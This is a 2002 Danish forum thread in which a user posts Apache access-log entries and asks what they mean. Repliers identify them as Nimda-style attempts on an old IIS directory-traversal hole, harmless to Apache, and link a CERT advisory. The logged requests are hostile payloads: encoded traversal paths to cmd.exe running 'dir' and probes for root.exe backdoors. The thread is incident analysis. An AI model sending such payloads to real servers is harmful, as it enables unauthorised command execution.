Avatar billede gchris5 Praktikant
26. februar 2002 - 18:36 Der er 7 kommentarer og
2 løsninger

Apache log

Nogen der kan fortælle mig hvad dette går ud på? Og er det en bevidst handling eller kan det være forudsaget af virus eller lign.?
<snip>
80.196.83.59 - - [26/Feb/2002:17:15:01 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
80.196.83.59 - - [26/Feb/2002:17:15:01 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
80.196.83.59 - - [26/Feb/2002:17:15:01 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
80.196.83.59 - - [26/Feb/2002:17:15:01 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
80.196.83.59 - - [26/Feb/2002:17:15:02 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
80.196.113.196 - - [26/Feb/2002:17:56:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
80.196.113.196 - - [26/Feb/2002:17:56:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
80.196.113.196 - - [26/Feb/2002:17:56:28 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.196.113.196 - - [26/Feb/2002:17:56:28 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.196.113.196 - - [26/Feb/2002:17:56:29 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
80.196.113.196 - - [26/Feb/2002:17:56:29 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
80.196.113.196 - - [26/Feb/2002:17:56:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
80.196.113.196 - - [26/Feb/2002:17:56:30 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
80.196.113.196 - - [26/Feb/2002:17:56:31 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
</snip>
Avatar billede disky Nybegynder
26. februar 2002 - 18:42 #1
forsøg på hacking.
Avatar billede disky Nybegynder
26. februar 2002 - 18:42 #2
Ejerne af de IP adresse forsøger at udnytte et kendt hul i Microsoft'es IIS server.

Hvilket Apache er ret ligeglad med :)
Avatar billede enobe Nybegynder
26. februar 2002 - 19:09 #3
apache længe leve - hurra, hurra, hurra!
Avatar billede gchris5 Praktikant
26. februar 2002 - 19:11 #4
Får man noget ud af at henvende sig til "ejeren"? Jeg ved en af disse er TDC's!
Avatar billede pbudk Nybegynder
26. februar 2002 - 19:13 #5
Det kan vel næppe kaldes et forsøg på hacking.

Nimda er derimod højst sandsynligt synderen. Men heldigvis kan den jo ikke stillet meget op overfor apache. ;o)
Avatar billede pbudk Nybegynder
26. februar 2002 - 19:15 #6
Jeg skal måske lige præcisere, at det ikke er dig, der er ramt af nimda, men derimod ejeren af 80.196.113.196
Avatar billede gchris5 Praktikant
26. februar 2002 - 19:16 #7
Har lige fundet ud af at en anden af "synderne" er Finansforbunden!

Men er det Nimda eller lignende ?!?!!??!
Avatar billede pbudk Nybegynder
26. februar 2002 - 19:18 #8
Prøv at læse nærmere på det her link:

http://www.cert.org/advisories/CA-2001-26.html
Avatar billede disky Nybegynder
26. februar 2002 - 19:20 #9
Det er forsøg på ulovlig indtrængen, altså hacking. Måske ikke vidende af ejerne.

Du kan maile det til TDC, med en opfordring om at de skulle fortælle de 2 brugere at de skulle købe et antivirus program.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester